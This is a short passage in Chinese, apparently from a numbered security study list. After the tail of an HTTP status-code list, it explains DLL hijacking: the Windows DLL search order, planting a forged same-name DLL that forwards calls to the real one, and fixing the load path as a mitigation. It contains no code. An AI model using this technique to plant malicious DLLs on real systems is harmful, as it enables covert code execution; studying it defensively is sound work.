404 Not Found //請求資源不存在，eg：輸入了錯誤的 URL
500 Internal Server Error //服務器發生不可預期的錯誤

81、Dll劫持漏洞

由于輸入表中只包含DLL名而沒有它的路徑名，因此加載程序必須在磁盤上搜 索 DLL 文件。首先會嘗試從當前程
序所在的目錄加載DLL，如果沒找到，則在 Windows系統目錄中查找，最后是在環境變量中列出的各個目錄下查
找。利用 這個特點，先偽造一個系統同名的DLL，提供同樣的輸出表，每個輸出函數轉向
真正的系統DLL。程序調用系統DLL時會先調用當前目錄下偽造的 DLL，完成相關功能后，再 跳到系統DLL同名函
數里執行。這個過程用個形象的詞來描述，就是系統DLL被劫持 （hijack）了。偽造的dll制作好后，放到程序當
前目錄下，這樣當原程序調用原函數時就調 用了偽造的dll的同名函數，進入劫持DLL的代碼，處理完畢后，再調
用原DLL此函數。
DLL劫持利用系統未知DLL的搜索路徑方式，使得程序加載當前目錄下的系統同名DLL。所以可 以告訴系統DLL的位
置，改變加載系統DLL的順序不是當前目錄，而是直接到系統目錄下查找。